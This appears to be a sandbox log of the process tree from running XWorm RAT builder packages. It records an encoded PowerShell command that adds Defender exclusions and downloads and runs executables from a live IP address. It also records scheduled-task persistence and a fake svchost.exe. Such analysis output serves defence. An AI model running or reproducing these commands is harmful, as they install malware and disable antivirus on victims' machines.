C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:12⤵PID:2324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:12⤵PID:2596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7128 /prefetch:12⤵PID:6888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7828 /prefetch:12⤵PID:5228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6460 /prefetch:82⤵
- NTFS ADS
PID:6736 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:12⤵PID:2276
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,2226051809037706321,13248390713929921655,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7960 /prefetch:12⤵PID:2940
-
C:\Users\Admin\Downloads\XWorm-3.1-main\XWorm-3.1-main\XWorm V3.1.exe"C:\Users\Admin\Downloads\XWorm-3.1-main\XWorm-3.1-main\XWorm V3.1.exe"1⤵PID:836
-
C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe"C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe"2⤵
- Executes dropped EXE
PID:1372 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵PID:6148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'3⤵PID:6332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'3⤵PID:6516
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"3⤵
- Creates scheduled task(s)
PID:6688
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:6968
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004BC 0x00000000000004B81⤵PID:7068
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:6312
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:5712
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:6952
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:6568
-
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"1⤵
- Suspicious use of SetThreadContext
PID:5192 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:3540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"3⤵
- Blocklisted process makes network request
PID:3376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;4⤵PID:7080
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:5500
-
C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe"1⤵
- Suspicious use of SetThreadContext
PID:7128 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"2⤵PID:800
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAcwBlACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAG4AYwBpACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAGoAZQBjAHQAaQBvAG4AIABmAGEAaQBsAGUAZAAhACAAWQBvAHUAIABtAHUAcwB0ACAAcgB1AG4AIAB0AGgAaQBzACAAcwBvAGYAdAB3AGEAcgBlACAAYQBzACAAQQBkAG0AaQBuACEAJwAsACcAJwAsACcATwBLACcALAAnAFcAYQByAG4AaQBuAGcAJwApADwAIwBuAHEAegAjAD4AOwAiADsAPAAjAHkAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB4AHYAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABxAHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAawBxAHAAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AeQBlAGwAbABvAHcALgBlAHgAZQAnACwAIAA8ACMAcABsAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAHAAaAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBlAGEAYwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAHMAYwBvAG4AZgAuAGUAeABlACcAKQApADwAIwBqAHMAdQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADUALgAzAC4AMgAyADMALgAyADMANAAvAGEAdgBkAGkAcwBhAGIAbABlAC4AYgBhAHQAJwAsACAAPAAjAG4AYwB5ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB1AHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB2AHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApACkAPAAjAGcAZwB6ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8ATQBQAFMAVgBDAC4AZQB4AGUAJwAsACAAPAAjAGIAegBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbABzAGkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBlAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApACkAPAAjAG4AYwBsACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkANQAuADMALgAyADIAMwAuADIAMwA0AC8AUABMAFYALgBlAHgAZQAnACwAIAA8ACMAZQBkAGsAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB2AGIAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHEAdAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAEwALgBlAHgAZQAnACkAKQA8ACMAYgBkAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcQBpAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AcwBjAG8AbgBmAC4AZQB4AGUAJwApADwAIwBhAGIAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBuAGsAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBwAHQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBvAGYAdABwAHIAbwB0AGUAYwB0AC4AYgBhAHQAJwApADwAIwB4AGoAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBrAGIAaQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABxAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbQBzAHYAYwBwAC4AZQB4AGUAJwApADwAIwBuAGEAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBpAGwAZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZgBtAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABMAC4AZQB4AGUAJwApADwAIwBrAG0AcQAjAD4A"3⤵
- Blocklisted process makes network request
PID:6700 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nci#>[System.Windows.Forms.MessageBox]::Show('Injection failed! You must run this software as Admin!','','OK','Warning')<#nqz#>;4⤵PID:3988
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6340
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:1536
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:2728
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6816
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:6800
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:5604
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:5352
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:2088
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe"1⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6708
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:6712
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:6272
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:7008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost1⤵PID:5060
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4056
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:6800
-
C:\Users\Admin\Pictures\b3ownddosser.exe"C:\Users\Admin\Pictures\b3ownddosser.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:7000 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:856
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX2⤵PID:4800
-
C:\Users\Admin\Pictures\b3ownddosser.exe"C:\Users\Admin\Pictures\b3ownddosser.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:6180 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:6276
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX2⤵PID:4856
-
C:\Users\Admin\Pictures\b3ownddosser.exe"C:\Users\Admin\Pictures\b3ownddosser.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:2728 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵PID:6440
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX2⤵PID:5196
-
C:\Users\Admin\Pictures\b3ownddosser.exe"C:\Users\Admin\Pictures\b3ownddosser.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:4928 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies registry class
PID:6064 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX2⤵PID:7000
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX2⤵PID:3288
-
C:\Users\Admin\Pictures\b3ownddosser.exe"C:\Users\Admin\Pictures\b3ownddosser.exe"1⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:1920 -
C:\Windows\explorer.exe"C:\Windows\explorer.exe"2⤵
- Modifies registry class
PID:5004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" H5IP9K 127.0.0.1 8001 PGVEIX2⤵PID:6152
-
C:\Users\Admin\AppData\Roaming\svchost.exeC:\Users\Admin\AppData\Roaming\svchost.exe1⤵
- Executes dropped EXE
PID:4260
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- NTFS ADS
PID:6676 -
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6544 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmpDF3E.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmpDF3E.tmp.bat3⤵PID:6484
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 6544"4⤵
- Enumerates processes with tasklist
PID:396 -
C:\Windows\system32\find.exefind ":"4⤵PID:3572
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:6364 -
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4496
-
C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XWorm RAT V2.1.exe"1⤵
- NTFS ADS
PID:4904 -
C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5588 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp46A.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp46A.tmp.bat3⤵PID:5020
-
C:\Windows\system32\tasklist.exeTasklist /fi "PID eq 5588"4⤵
- Enumerates processes with tasklist
PID:1212 -
C:\Windows\system32\find.exefind ":"4⤵PID:6548
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:3704 -
